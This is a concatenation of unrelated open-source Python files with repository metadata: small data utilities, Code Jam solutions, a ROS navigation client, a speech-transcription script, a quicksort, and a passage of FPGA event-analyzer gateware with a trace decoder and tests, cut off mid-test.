8b692184b386024af060eee707d4abc263e016b8 | 2b2ac45bd210a2dc9ba95ee8d43d72017148a060 | /xml2df.py | 36dab35727b7f753eed400c5226f6310de41f3e3 | [] | no_license | luqiang21/small_useful_tools | f45c2e85f748d6e3c197b775051cb175059c409e | 10e0f41e0293badb7f44daa0e4585a0d68f658bb | refs/heads/master | 2021-01-17T12:29:41.766066 | 2018-01-08T23:20:29 | 2018-01-08T23:20:29 | 95,399,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | '''read xml file as dataframe'''
import xml.etree.ElementTree as ET
import pandas as pd
def xml2df(xml_file):
xml_data = open(xml_file).read()
root = ET.XML(xml_data) # element tree
all_records = []
for i, child in enumerate(root):
record = {}
for subchild in child:
record[subchild.tag] = subchild.text
all_records.append(record)
    print(len(all_records))
return pd.DataFrame(all_records)
xml_file = 'youXMLFile'
df = xml2df(xml_file)
from lxml import objectify
import pandas as pd
def xml2df_(path):
xml = objectify.parse(open(path))
root = xml.getroot()
columns = []
for element in root.getchildren()[0].getchildren():
# print element.tag
columns.append(element.tag)
root.getchildren()[0].getchildren()
n = len(root.getchildren())
row_s = []
for i in range(0,n):
obj = root.getchildren()[i].getchildren()
row = {}
for idx in range(len(columns)):
column = columns[idx]
row[column] = obj[idx].text
row_s.append(row)
df = pd.DataFrame(row_s)
return df
df2 = xml2df_(xml_file)
df2.head()
| [
"[email protected]"
] | |
aad9d93b67d623651393d22114af6f64db39f48d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_138/202.py | 24acce18318d21c58ecc931e58583447ad9cae57 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | from bisect import bisect_left
from copy import copy
def get_results(N, K):
N.sort()
K.sort()
L = len(N)
dwar_points = 0
ken_start = 0
for i in xrange(L):
if N[i] > K[ken_start]:
dwar_points += 1
ken_start += 1
war_points = 0
for i in xrange(len(N)-1,-1,-1):
ken_pos = bisect_left(K, N[i])
if ken_pos == len(K):
ken_choice = 0
else:
ken_choice = ken_pos
if N[i] > K[ken_choice]:
war_points += 1
del N[i]
del K[ken_choice]
return (dwar_points, war_points)
def solve(in_name, out_name):
fin = open(in_name, 'r')
L = fin.readlines()
fin.close()
T = int(L[0])
k = 1
res = []
for i in xrange(T):
n = int(L[k])
N = map(float, L[k+1].strip().split())
K = map(float, L[k+2].strip().split())
k += 3
results = get_results(N, K)
res.append('Case #' + str(i+1) + ': ' + str(results[0]) + ' ' + str(results[1]) + '\n')
fout = open(out_name, 'w')
fout.writelines(res)
fout.close()
return
#solve('D-test.in', 'D-test.out')
#solve('D-small-attempt0.in', 'D-small-attempt0.out')
solve('D-large.in', 'D-large.out')
| [
"[email protected]"
] | |
460f2179888de444cbe24cfc58ee5af6d80c60bf | 8ce262b59918cd3e4f00cfd3b2ac7a3e193f826f | /moveBase.py | 439648c8878f18aaa88c4bbc699f8b0bb88a3a59 | [
"BSD-3-Clause"
] | permissive | hanlinniu/ROS-Turtlebot3 | 05665efb38a0ac588dcbbf7fc973bc40ae02990c | 377069eba73f68f2963e57e050310e8d1c6f3977 | refs/heads/master | 2022-04-15T03:21:41.781887 | 2018-04-24T16:46:20 | 2018-04-24T16:46:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | #!/usr/bin/env python
#Move turtlebot3 from location A to location B through move_base, action client
import rospy
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
def movebase_client():
client = actionlib.SimpleActionClient('move_base',MoveBaseAction)
client.wait_for_server()
#define goal/pose
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = 0.5
goal.target_pose.pose.orientation.w = 1.0
# send goal and wait for result (Todo: shrink delay)
client.send_goal(goal)
wait = client.wait_for_result()
    # If the move_base action server is unavailable (navigation stack not running), shut down; otherwise return the result.
if not wait:
rospy.logerr("Server not available!")
rospy.signal_shutdown("Server not available!")
else:
return client.get_result()
if __name__ == '__main__':
try:
rospy.init_node('movebase_client_py')
result = movebase_client()
if result:
rospy.loginfo("Reached goal!")
except rospy.ROSInterruptException:
rospy.loginfo("Interrupt, navigation finnished.")
| [
"[email protected]"
] | |
109022396ac7b45bbcd47850815b3f7da8cc38d3 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/1519.py | 648f239ba0d124b8971fef4c06e15947f1995be6 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | from bisect import insort, bisect_left, bisect_right
def palin(x):
return str(x) == str(x)[::-1]
arr = []
def gen(N):
for x in range(1, int(N**.5)+1):
if palin(x) and palin(x*x) and 1 <= x*x <= N:
insort(arr, x*x)
def solve(A, B):
l = bisect_left(arr, A)
r = bisect_right(arr, B)
return r-l
if __name__ == '__main__':
gen(10**14)
T = int(raw_input())
for case in range(1,T+1):
A, B = map(int, raw_input().split())
print "Case #{}: {}".format(case, solve(A, B))
| [
"[email protected]"
] | |
55685403b7ba08fe75f120d98b388f791e9cc8ab | dc37120202e5fc2c2f0900c3059af81830a0dcac | /AutoTranscribe_pauses.py | ee4904994ea20fbba78d8252c9ad3c32c0a563e8 | [] | no_license | AnanyaCoder/SSMT-Experiment1 | 582c4e4b3ea8df2214e3b5cdda8e589dd91458d1 | 926a6c617e486d31ec305e5fabd0a95210f5b3d5 | refs/heads/master | 2021-03-11T13:02:26.118035 | 2020-03-11T09:48:34 | 2020-03-11T09:48:34 | 246,531,457 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,151 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 30 16:33:47 2019
@author: ananya
"""
import speech_recognition as sr
choppedWaveFiles = 'split_pauses_Files/'
outputFile = 'Transcribed.txt'
f = open(outputFile, "w+")
#Generate the wave files for all the audio files
choppedList = ['s_1.wav', 's_2.wav', 's_3.wav', 's_4.wav', 's_5.wav', 's_6.wav', 's_7.wav', 's_8.wav', 's_9.wav', 's_10.wav', 's_11.wav', 's_12.wav', 's_13.wav', 's_14.wav', 's_15.wav', 's_16.wav', 's_17.wav', 's_18.wav', 's_19.wav', 's_20.wav', 's_21.wav', 's_22.wav', 's_23.wav', 's_24.wav', 's_25.wav', 's_26.wav', 's_27.wav', 's_28.wav', 's_29.wav', 's_30.wav', 's_31.wav', 's_32.wav', 's_33.wav', 's_34.wav', 's_35.wav', 's_36.wav', 's_37.wav', 's_38.wav', 's_39.wav', 's_40.wav', 's_41.wav', 's_42.wav', 's_43.wav', 's_44.wav', 's_45.wav', 's_45_1.wav', 's_45_2.wav', 's_45_3.wav', 's_45_4.wav', 's_45_5.wav', 's_45_6.wav', 's_46.wav', 's_47.wav', 's_48.wav', 's_49.wav', 's_50.wav', 's_51.wav', 's_52.wav', 's_53.wav', 's_54.wav', 's_55.wav', 's_56.wav', 's_57.wav', 's_58.wav', 's_59.wav', 's_60.wav', 's_61.wav', 's_62.wav', 's_63.wav', 's_64.wav', 's_65.wav', 's_66.wav', 's_67.wav', 's_68.wav', 's_69.wav', 's_70.wav', 's_71.wav', 's_72.wav', 's_73.wav', 's_74.wav', 's_75.wav', 's_76.wav', 's_77.wav', 's_78.wav', 's_79.wav', 's_80.wav', 's_81.wav', 's_82.wav', 's_83.wav', 's_84.wav', 's_85.wav', 's_86.wav', 's_87.wav', 's_88.wav', 's_89.wav', 's_90.wav', 's_91.wav', 's_92.wav', 's_93.wav', 's_94.wav', 's_95.wav', 's_96.wav', 's_97.wav', 's_98.wav', 's_99.wav', 's_100.wav', 's_101.wav', 's_102.wav', 's_103.wav', 's_104.wav', 's_105.wav', 's_106.wav', 's_107.wav', 's_108.wav', 's_109.wav', 's_110.wav', 's_111.wav', 's_112.wav', 's_113.wav', 's_114.wav', 's_115.wav', 's_116.wav', 's_117.wav', 's_118.wav', 's_119.wav', 's_120.wav', 's_121.wav', 's_122.wav', 's_123.wav', 's_124.wav', 's_125.wav', 's_126.wav', 's_127.wav', 's_128.wav', 's_129.wav', 's_130.wav', 's_131.wav', 's_132.wav', 's_133.wav', 's_134.wav', 's_135.wav', 's_136.wav', 's_137.wav', 's_138.wav', 's_139.wav', 's_140.wav', 's_141.wav', 's_142.wav', 's_143.wav', 's_144.wav', 's_145.wav', 's_146.wav', 's_147.wav', 's_148.wav', 's_149.wav', 's_150.wav', 's_151.wav', 's_152.wav', 's_153.wav', 's_154.wav', 's_155.wav', 's_156.wav', 's_157.wav', 's_158.wav', 's_159.wav', 's_160.wav', 's_161.wav', 's_162.wav', 's_163.wav', 's_164.wav', 's_165.wav', 's_166.wav', 's_167.wav', 's_168.wav', 's_169.wav', 's_170.wav', 's_171.wav', 's_172.wav', 's_173.wav', 's_174.wav', 's_175.wav', 's_176.wav', 's_177.wav', 's_178.wav', 's_179.wav', 's_180.wav', 's_181.wav', 's_182.wav', 's_183.wav', 's_184.wav', 's_185.wav', 's_186.wav', 's_187.wav', 's_188.wav', 's_189.wav', 's_190.wav', 's_191.wav', 's_192.wav', 's_193.wav', 's_194.wav', 's_195.wav', 's_196.wav', 's_197.wav', 's_198.wav', 's_199.wav', 's_200.wav', 's_201.wav', 's_202.wav', 's_203.wav', 's_204.wav', 's_205.wav', 's_206.wav', 's_207.wav', 's_208.wav', 's_209.wav', 's_210.wav', 's_211.wav', 's_212.wav', 's_213.wav', 's_214.wav', 's_215.wav', 's_216.wav', 's_217.wav', 's_218.wav', 's_219.wav', 's_220.wav', 's_221.wav', 's_222.wav', 's_223.wav', 's_224.wav', 's_225.wav', 's_226.wav', 's_227.wav', 's_228.wav']
for wavfile in choppedList:
file = choppedWaveFiles+wavfile
print("Processing"+file)
r = sr.Recognizer()
# recognize the chunk
with sr.AudioFile(file) as source:
# remove this if it is not working
# correctly.
#r.adjust_for_ambient_noise(source)
audio_listened = r.listen(source)
try:
# try converting it to text
rec = r.recognize_google(audio_listened,language="en-IN")
# write the output to the file.
f.write(rec+". ")
f.write("\n")
# catch any errors.
except sr.UnknownValueError:
print("Could not understand audio")
error = "Error occured at chunk"+wavfile
f.write(error+". ")
f.write("\n")
    except sr.RequestError as e:
        print("Could not request results; check your internet connection.")

f.close()
| [
"[email protected]"
] | |
f752ed117122b654d3db7de4b0b29d175e3d6732 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/sets_20200605201123.py | da4da35d79893db365b73571b8ec063d8489a308 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | def Strings(str):
values = {}
newArray = []
keys = []
for i in str:
newArray.append(i.split(":"))
for j in range(len(newArray)):
if newArray[j][0] in values:
values[newArray[j][0]] += int(newArray[j][1])
else:
values[newArray[j][0]] = int(newArray[j][1])
for k in values:
keys.append(k)
keys = sorted(keys)
# for i in keys:
# if i in values:
# answer = values[i]
print
Strings(["Z:1","B:3","C:3","Z:4","B:2"])
| [
"[email protected]"
] | |
61ca45d83eb6073d7855e1253f88d235326f2005 | db7601406ea38e0b361d9a1c54ba640ae9b132eb | /quicksort.py | 0463437079b854f611c9d76d6e9146e84805bc56 | [] | no_license | FalseF/Algorithms-and-Problem-Solving-with-Python | c06c049d7499df76795eac8b82d8f5aebe126109 | d53ee80da5ff865eef05bbe280bdc68dae4f275d | refs/heads/master | 2023-07-17T06:24:47.918286 | 2021-09-06T16:32:30 | 2021-09-06T16:32:30 | 403,690,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | cnt=0
def partition(A,low,high):
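    # Lomuto partition: the last element is the pivot; elements <= pivot are moved to
    # the front, and the pivot's final index is returned.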
global cnt
pivot=A[high]
i=low-1
for j in range(low,high):
if(pivot>=A[j]):
i+=1
A[i],A[j]=A[j],A[i]
cnt+=1
A[i+1],A[high]=A[high],A[i+1]
cnt+=1
return i+1
def quick_sort(A,low,high):
if(low<high):
pivot=partition(A,low,high)
quick_sort(A,low,pivot-1)
quick_sort(A,pivot+1,high)
A=[10,5,4,1,8]
quick_sort(A,0,len(A)-1)
print(A)
print("Swapping time")
print(cnt) | [
"[email protected]"
] | |
5918ac3617d6a5c640a6e0aca7193152daaf268f | b0a217700c563c4f057f2aebbde8faba4b1b26d2 | /software/glasgow/gateware/analyzer.py | bb4a69bc6366646bbb3c9b40d54291e9a389cd88 | [
"0BSD",
"Apache-2.0"
] | permissive | kbeckmann/Glasgow | 5d183865da4fb499099d4c17e878a76192b691e7 | cd31e293cb99ee10a3e4a03ff26f6f124e512c64 | refs/heads/master | 2021-09-15T15:59:38.211633 | 2018-11-15T22:36:04 | 2018-11-22T21:13:59 | 157,077,707 | 3 | 0 | NOASSERTION | 2018-11-11T12:33:49 | 2018-11-11T12:33:48 | null | UTF-8 | Python | false | false | 29,898 | py | from functools import reduce
from collections import OrderedDict
from migen import *
from migen.fhdl.bitcontainer import log2_int
from migen.genlib.fifo import _FIFOInterface, SyncFIFOBuffered
from migen.genlib.coding import PriorityEncoder, PriorityDecoder
from migen.genlib.fsm import FSM
__all__ = ["EventSource", "EventAnalyzer", "TraceDecodingError", "TraceDecoder"]
REPORT_DELAY = 0b10000000
REPORT_DELAY_MASK = 0b10000000
REPORT_EVENT = 0b01000000
REPORT_EVENT_MASK = 0b11000000
REPORT_SPECIAL = 0b00000000
REPORT_SPECIAL_MASK = 0b11000000
SPECIAL_DONE = 0b000000
SPECIAL_OVERRUN = 0b000001
SPECIAL_THROTTLE = 0b000010
SPECIAL_DETHROTTLE = 0b000011
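# Report byte layout, as produced by the serializer below and consumed by TraceDecoder:
# a byte with the MSB set is a delay report carrying a 7-bit septet (most significant
# septet first); 01xxxxxx is an event report carrying a 6-bit event source index,
# followed by that source's data octets; 00xxxxxx is a special report carrying one of
# the SPECIAL_* codes above in its low bits.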
class EventSource(Module):
def __init__(self, name, kind, width, fields, depth):
assert (width > 0 and kind in ("change", "strobe") or
width == 0 and kind == "strobe")
self.name = name
self.width = width
self.fields = fields
self.depth = depth
self.kind = kind
self.data = Signal(max(1, width))
self.trigger = Signal()
class EventAnalyzer(Module):
"""
An event analyzer module.
This event analyzer is designed to observe parallel, bursty processes in real-time, and yet
degrade gracefully (i.e. without losing data or breaking most applets) when observing processes
that generate events continuously, or generate very many simultaneous events for a short time.
To do this, the event analyzer is permitted to pause any applets marked as purely synchronous
once the event FIFO high-water mark is reached.
The event analyzer tries to make efficient use of power-of-2 wide block RAMs and be highly
tunable. To achieve this, it separates the event FIFO from the event data FIFOs, and does not
    store timestamps explicitly. In a system with `n` events, each of which carries `d_n` bits
of data, there would be a single event FIFO that is `n` bits wide, where a bit being set means
that event `n` occurred at a given cycle; `n` event data FIFOs that are `d_n` bits wide each,
where, if a bit is set in the event FIFO, a data word is pushed into the event data FIFO; and
finally, one delay FIFO, where the last entry is incremented on every cycle that has
no event, and a new entry is pushed on every cycle there is at least one event. This way,
only cycles that have at least one event add new FIFO entries, and only one wide timestamp
counter needs to be maintained, greatly reducing the amount of necessary resources compared
to a more naive approach.
"""
@staticmethod
def _depth_for_width(width):
if width == 0:
return 0
elif width <= 2:
return 2048
elif width <= 4:
return 1024
elif width <= 8:
return 512
else:
return 256
def __init__(self, output_fifo, event_depth=None, delay_width=16):
assert output_fifo.width == 8
self.output_fifo = output_fifo
self.delay_width = delay_width
self.event_depth = event_depth
self.event_sources = Array()
self.done = Signal()
self.throttle = Signal()
self.overrun = Signal()
def add_event_source(self, name, kind, width, fields=(), depth=None):
if depth is None:
depth = self._depth_for_width(width)
event_source = EventSource(name, kind, width, fields, depth)
self.event_sources.append(event_source)
return event_source
def do_finalize(self):
assert len(self.event_sources) < 2 ** 6
assert max(s.width for s in self.event_sources) <= 32
# Fill the event, event data, and delay FIFOs.
throttle_on = Signal()
throttle_off = Signal()
throttle_edge = Signal()
throttle_fifos = []
self.sync += [
If(~self.throttle & throttle_on,
self.throttle.eq(1),
throttle_edge.eq(1)
).Elif(self.throttle & throttle_off,
self.throttle.eq(0),
throttle_edge.eq(1)
).Else(
throttle_edge.eq(0)
)
]
overrun_trip = Signal()
overrun_fifos = []
self.sync += [
If(overrun_trip,
self.overrun.eq(1)
)
]
event_width = 1 + len(self.event_sources)
if self.event_depth is None:
event_depth = min(self._depth_for_width(event_width),
self._depth_for_width(self.delay_width))
else:
event_depth = self.event_depth
self.submodules.event_fifo = event_fifo = \
SyncFIFOBuffered(width=event_width, depth=event_depth)
throttle_fifos.append(self.event_fifo)
self.comb += [
event_fifo.din.eq(Cat(self.throttle, [s.trigger for s in self.event_sources])),
event_fifo.we.eq(reduce(lambda a, b: a | b, (s.trigger for s in self.event_sources)) |
throttle_edge)
]
self.submodules.delay_fifo = delay_fifo = \
SyncFIFOBuffered(width=self.delay_width, depth=event_depth)
delay_timer = self._delay_timer = Signal(self.delay_width)
delay_ovrun = ((1 << self.delay_width) - 1)
delay_max = delay_ovrun - 1
self.sync += [
If(delay_fifo.we,
delay_timer.eq(0)
).Else(
delay_timer.eq(delay_timer + 1)
)
]
self.comb += [
delay_fifo.din.eq(Mux(self.overrun, delay_ovrun, delay_timer)),
delay_fifo.we.eq(event_fifo.we | (delay_timer == delay_max) |
self.done | self.overrun),
]
for event_source in self.event_sources:
if event_source.width > 0:
event_source.submodules.data_fifo = event_data_fifo = \
SyncFIFOBuffered(event_source.width, event_source.depth)
self.submodules += event_source
throttle_fifos.append(event_data_fifo)
self.comb += [
event_data_fifo.din.eq(event_source.data),
event_data_fifo.we.eq(event_source.trigger),
]
else:
event_source.submodules.data_fifo = _FIFOInterface(1, 0)
# Throttle applets based on FIFO levels with hysteresis.
self.comb += [
throttle_on .eq(reduce(lambda a, b: a | b,
(f.fifo.level >= f.depth - f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
throttle_off.eq(reduce(lambda a, b: a & b,
(f.fifo.level < f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
]
# Detect imminent FIFO overrun and trip overrun indication.
self.comb += [
overrun_trip.eq(reduce(lambda a, b: a | b,
(f.fifo.level == f.depth - 2
for f in throttle_fifos)))
]
# Dequeue events, and serialize events and event data.
self.submodules.event_encoder = event_encoder = \
PriorityEncoder(width=len(self.event_sources))
self.submodules.event_decoder = event_decoder = \
PriorityDecoder(width=len(self.event_sources))
self.comb += event_decoder.i.eq(event_encoder.o)
self.submodules.serializer = serializer = FSM(reset_state="WAIT-EVENT")
rep_overrun = Signal()
rep_throttle_new = Signal()
rep_throttle_cur = Signal()
delay_septets = 5
delay_counter = Signal(7 * delay_septets)
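        # Five 7-bit septets can express up to 2**35 - 1 cycles of delay between reports;
        # individual delay FIFO entries (delay_width bits each) are accumulated into this
        # wider counter before being serialized.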
serializer.act("WAIT-EVENT",
If(delay_fifo.readable,
delay_fifo.re.eq(1),
NextValue(delay_counter, delay_counter + delay_fifo.dout + 1),
If(delay_fifo.dout == delay_ovrun,
NextValue(rep_overrun, 1),
NextState("REPORT-DELAY")
)
),
If(event_fifo.readable,
event_fifo.re.eq(1),
NextValue(event_encoder.i, event_fifo.dout[1:]),
NextValue(rep_throttle_new, event_fifo.dout[0]),
If((event_fifo.dout != 0) | (rep_throttle_cur != event_fifo.dout[0]),
NextState("REPORT-DELAY")
)
).Elif(self.done,
NextState("REPORT-DELAY")
)
)
serializer.act("REPORT-DELAY",
If(delay_counter >= 128 ** 4,
NextState("REPORT-DELAY-5")
).Elif(delay_counter >= 128 ** 3,
NextState("REPORT-DELAY-4")
).Elif(delay_counter >= 128 ** 2,
NextState("REPORT-DELAY-3")
).Elif(delay_counter >= 128 ** 1,
NextState("REPORT-DELAY-2")
).Else(
NextState("REPORT-DELAY-1")
)
)
for septet_no in range(delay_septets, 0, -1):
if septet_no == 1:
next_state = [
NextValue(delay_counter, 0),
If(rep_overrun,
NextState("REPORT-OVERRUN")
).Elif(rep_throttle_cur != rep_throttle_new,
NextState("REPORT-THROTTLE")
).Elif(event_encoder.i,
NextState("REPORT-EVENT")
).Elif(self.done,
NextState("REPORT-DONE")
).Else(
NextState("WAIT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-DELAY-%d" % (septet_no - 1))
]
serializer.act("REPORT-DELAY-%d" % septet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(
REPORT_DELAY | delay_counter.part((septet_no - 1) * 7, 7)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-THROTTLE",
If(self.output_fifo.writable,
NextValue(rep_throttle_cur, rep_throttle_new),
If(rep_throttle_new,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_THROTTLE),
).Else(
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DETHROTTLE),
),
self.output_fifo.we.eq(1),
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
)
)
event_source = self.event_sources[event_encoder.o]
event_data = Signal(32)
serializer.act("REPORT-EVENT",
If(self.output_fifo.writable,
NextValue(event_encoder.i, event_encoder.i & ~event_decoder.o),
self.output_fifo.din.eq(
REPORT_EVENT | event_encoder.o),
self.output_fifo.we.eq(1),
NextValue(event_data, event_source.data_fifo.dout),
event_source.data_fifo.re.eq(1),
If(event_source.width > 24,
NextState("REPORT-EVENT-DATA-4")
).Elif(event_source.width > 16,
NextState("REPORT-EVENT-DATA-3")
).Elif(event_source.width > 8,
NextState("REPORT-EVENT-DATA-2")
).Elif(event_source.width > 0,
NextState("REPORT-EVENT-DATA-1")
).Else(
If(event_encoder.i & ~event_decoder.o,
NextState("REPORT-EVENT")
).Else(
NextState("WAIT-EVENT")
)
)
)
)
for octet_no in range(4, 0, -1):
if octet_no == 1:
next_state = [
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-EVENT-DATA-%d" % (octet_no - 1))
]
serializer.act("REPORT-EVENT-DATA-%d" % octet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(event_data.part((octet_no - 1) * 8, 8)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-DONE",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DONE),
self.output_fifo.we.eq(1),
NextState("DONE")
)
)
serializer.act("DONE",
If(~self.done,
NextState("WAIT-EVENT")
)
)
serializer.act("REPORT-OVERRUN",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_OVERRUN),
self.output_fifo.we.eq(1),
NextState("OVERRUN")
)
)
serializer.act("OVERRUN",
NextState("OVERRUN")
)
class TraceDecodingError(Exception):
pass
class TraceDecoder:
"""
Event analyzer trace decoder.
Decodes raw analyzer traces into a timestamped sequence of maps from event fields to
their values.
"""
def __init__(self, event_sources, absolute_timestamps=True):
self.event_sources = event_sources
self.absolute_timestamps = absolute_timestamps
self._state = "IDLE"
self._byte_off = 0
self._timestamp = 0
self._delay = 0
self._event_src = 0
self._event_off = 0
self._event_data = 0
self._pending = OrderedDict()
self._timeline = []
def events(self):
"""
        Return the name, kind and width of each event that may be emitted by this trace decoder.
"""
yield ("throttle", "throttle", 1)
for event_src in self.event_sources:
if event_src.fields:
for field_name, field_width in event_src.fields:
yield ("%s-%s" % (field_name, event_src.name), event_src.kind, field_width)
else:
yield (event_src.name, event_src.kind, event_src.width)
def _flush_timestamp(self):
if self._delay == 0:
return
if self._pending:
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
if self.absolute_timestamps:
self._timestamp += self._delay
else:
self._timestamp = self._delay
self._delay = 0
def process(self, data):
"""
Incrementally parse a chunk of analyzer trace, and record events in it.
"""
for octet in data:
is_delay = ((octet & REPORT_DELAY_MASK) == REPORT_DELAY)
is_event = ((octet & REPORT_EVENT_MASK) == REPORT_EVENT)
is_special = ((octet & REPORT_SPECIAL_MASK) == REPORT_SPECIAL)
special = octet & ~REPORT_SPECIAL
if self._state == "IDLE" and is_delay:
self._state = "DELAY"
self._delay = octet & ~REPORT_DELAY_MASK
elif self._state == "DELAY" and is_delay:
self._delay = (self._delay << 7) | (octet & ~REPORT_DELAY_MASK)
elif self._state == "DELAY" and is_special and \
special in (SPECIAL_THROTTLE, SPECIAL_DETHROTTLE):
self._flush_timestamp()
if special == SPECIAL_THROTTLE:
self._pending["throttle"] = 1
elif special == SPECIAL_DETHROTTLE:
self._pending["throttle"] = 0
elif self._state in ("IDLE", "DELAY") and is_event:
self._flush_timestamp()
                if (octet & ~REPORT_EVENT_MASK) >= len(self.event_sources):
raise TraceDecodingError("at byte offset %d: event source out of bounds" %
self._byte_off)
self._event_src = self.event_sources[octet & ~REPORT_EVENT_MASK]
if self._event_src.width == 0:
self._pending[self._event_src.name] = None
self._state = "IDLE"
else:
self._event_off = self._event_src.width
self._event_data = 0
self._state = "EVENT"
elif self._state == "EVENT":
self._event_data <<= 8
self._event_data |= octet
if self._event_off > 8:
self._event_off -= 8
else:
if self._event_src.fields:
offset = 0
for field_name, field_width in self._event_src.fields:
self._pending["%s-%s" % (field_name, self._event_src.name)] = \
(self._event_data >> offset) & ((1 << field_width) - 1)
offset += field_width
else:
self._pending[self._event_src.name] = self._event_data
self._state = "IDLE"
            elif self._state == "DELAY" and is_special and \
special in (SPECIAL_DONE, SPECIAL_OVERRUN):
self._flush_timestamp()
if special == SPECIAL_DONE:
self._state = "DONE"
elif special == SPECIAL_OVERRUN:
self._state = "OVERRUN"
else:
raise TraceDecodingError("at byte offset %d: invalid byte %#04x for state %s" %
(self._byte_off, octet, self._state))
self._byte_off += 1
def flush(self, pending=False):
"""
Return the complete event timeline since the start of decoding or the previous flush.
If ``pending`` is ``True``, also flushes pending events; this may cause duplicate
timestamps if more events arrive after the flush.
"""
if self._state == "OVERRUN":
self._timeline.append((self._timestamp, "overrun"))
elif pending and self._pending or self._state == "DONE":
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
timeline, self._timeline = self._timeline, []
return timeline
def is_done(self):
return self._state in ("DONE", "OVERRUN")
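# A minimal usage sketch for the decoder above (the event-source list normally comes from
# EventAnalyzer.add_event_source; the event name shown is purely hypothetical):
#
#   decoder = TraceDecoder(analyzer.event_sources)
#   decoder.process(data_read_from_output_fifo)
#   for timestamp, events in decoder.flush(pending=True):
#       print(timestamp, events)        # e.g. (2, {"stall": 1}) or (65536, "overrun")
#
# Each timeline entry pairs a cycle count with a dict mapping event (or field) names to values,
# or the string "overrun" if the capture overflowed.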
# -------------------------------------------------------------------------------------------------
import unittest
from migen.fhdl import verilog
from . import simulation_test
class EventAnalyzerTestbench(Module):
def __init__(self, **kwargs):
self.submodules.fifo = SyncFIFOBuffered(width=8, depth=64)
self.submodules.dut = EventAnalyzer(self.fifo, **kwargs)
def trigger(self, index, data):
yield self.dut.event_sources[index].trigger.eq(1)
yield self.dut.event_sources[index].data.eq(data)
def step(self):
yield
for event_source in self.dut.event_sources:
yield event_source.trigger.eq(0)
def read(self, count, limit=128):
data = []
cycle = 0
while len(data) < count:
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if not (yield self.fifo.readable):
raise ValueError("FIFO underflow")
data.append((yield from self.fifo.read()))
cycle = 16
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if (yield self.fifo.readable):
raise ValueError("junk in FIFO: %#04x at %d" % ((yield self.fifo.dout), count))
return data
class EventAnalyzerTestCase(unittest.TestCase):
def setUp(self):
self.tb = EventAnalyzerTestbench(event_depth=16)
def configure(self, tb, sources):
for n, args in enumerate(sources):
if not isinstance(args, tuple):
args = (args,)
tb.dut.add_event_source(str(n), "strobe", *args)
def assertEmitted(self, tb, data, decoded, flush_pending=True):
self.assertEqual((yield from tb.read(len(data))), data)
decoder = TraceDecoder(self.tb.dut.event_sources)
decoder.process(data)
self.assertEqual(decoder.flush(flush_pending), decoded)
@simulation_test(sources=(8,))
def test_one_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
], [
(2, {"0": 0xaa}),
])
@simulation_test(sources=(8,8))
def test_two_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.trigger(1, 0xbb)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
REPORT_EVENT|1, 0xbb,
], [
(2, {"0": 0xaa, "1": 0xbb}),
])
@simulation_test(sources=(12,))
def test_one_12bit_src(self, tb):
yield from tb.trigger(0, 0xabc)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0x0a, 0xbc,
], [
(2, {"0": 0xabc}),
])
@simulation_test(sources=(16,))
def test_one_16bit_src(self, tb):
yield from tb.trigger(0, 0xabcd)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd,
], [
